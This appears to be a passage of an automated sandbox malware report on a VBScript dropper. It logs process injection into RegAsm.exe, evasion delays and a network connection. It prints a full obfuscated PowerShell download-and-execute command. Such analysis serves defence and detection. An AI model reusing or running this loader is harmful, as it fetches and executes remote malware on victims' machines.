Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: UserDomain();IWshNetwork2.UserName();IHost.CreateObject("WScript.Network");IWshNetwork2.AddWindowsPrinterConnection("\\SRVHOMOLOGDC1\Brother", "Brother");IWshNetwork2.AddWindowsPrinterConnection("\\SR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 1650000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 32A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 31C0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 590109	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 589859	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 589625	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 589140	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 589000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 588890	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2325	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1397	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3552	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6249	Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 7124	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2500	Thread sleep count: 2325 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2500	Thread sleep count: 1397 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5804	Thread sleep count: 69 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1704	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5668	Thread sleep count: 3552 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5680	Thread sleep count: 6249 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1148	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1148	Thread sleep time: -590109s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1148	Thread sleep time: -589859s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1148	Thread sleep time: -589625s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1148	Thread sleep time: -589140s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1148	Thread sleep time: -589000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1148	Thread sleep time: -588890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6072	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2992	Thread sleep count: 51 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2992	Thread sleep time: -51000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 590109	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 589859	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 589625	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 589140	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 589000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 588890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: wscript.exe, 0000000B.00000003.2422099972.0000018B28301000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2422193313.0000018B28701000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2421972029.0000018B28909000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2386274021.0000018B28505000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2561300775.000002B8BCD31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2561111913.000002B8BCF3C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2472780471.000002B8BCB35000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2561201740.000002B8BC931000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2641973972.000002854A101000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2641730221.000002854A70F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2642077703.000002854A501000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cmd = "cmd /c wevtutil epl ""Microsoft-Windows-Hyper-V-VMMS-Networking"" " & vmmslogFileName
Source: wscript.exe, 0000000E.00000003.2592623099.000002854A24C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2593164555.000002854A253000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: iJat(r`cmd /c wevtutil epl System /q:"*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]" esults>"
Source: escudellar.vbs.8.dr	Binary or memory string: "$output += ""(Get-VMNetworkAdapter -all)""; " & _
Source: wscript.exe, 0000000E.00000003.2592623099.000002854A24C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2593164555.000002854A253000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @cmd /c wevtutil epl "Microsoft-Windows-Hyper-V-VMMS-Networking" > 0, GetReHy%J
Source: RegAsm.exe, 0000000A.00000002.2974921941.00000000016C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
Source: wscript.exe, 0000000E.00000003.2593164555.000002854A253000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Get*$output += "(Get-VMNetworkAdapter -all)"; R_Mess
Source: wscript.exe, 0000000B.00000003.2422099972.0000018B28301000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2422193313.0000018B28701000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2421972029.0000018B28909000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2386274021.0000018B28505000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2561300775.000002B8BCD31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2561111913.000002B8BCF3C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2472780471.000002B8BCB35000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2561201740.000002B8BC931000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2641973972.000002854A101000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2641730221.000002854A70F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2642077703.000002854A501000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cmd = "cmd /c wevtutil epl System /q:""*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]"" " & vmswitchlogFileName
Source: wscript.exe, 00000000.00000002.1886130177.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWe
Source: wscript.exe, 00000000.00000002.1886130177.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1885341405.000001A85E546000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878557421.000001A85E53C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879126791.000001A85E545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 0000000B.00000003.2386573270.0000018B2844D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2387502527.0000018B28453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2478326630.000002B8BCA7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2478754680.000002B8BCA83000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @cmd /c wevtutil epl "Microsoft-Windows-Hyper-V-VMMS-Networking" rt></Analy
Source: wscript.exe, 0000000B.00000003.2387502527.0000018B28453000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntEl*$output += "(Get-VMNetworkAdapter -all)"; GetEpnE(
Source: wscript.exe, 0000000C.00000003.2478754680.000002B8BCA83000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntEl*$output += "(Get-VMNetworkAdapter -all)"; GetEpn
Source: wscript.exe, 0000000B.00000003.2386573270.0000018B2844D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2387502527.0000018B28453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2478326630.000002B8BCA7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2478754680.000002B8BCA83000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: iJOpti`cmd /c wevtutil epl System /q:"*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]" act

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Memory allocated: page read and write | page guard

System process connects to network (likely due to code injection or exploit)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe

Network Connect: 172.67.187.200 443

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_6276.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6276, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1046008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBv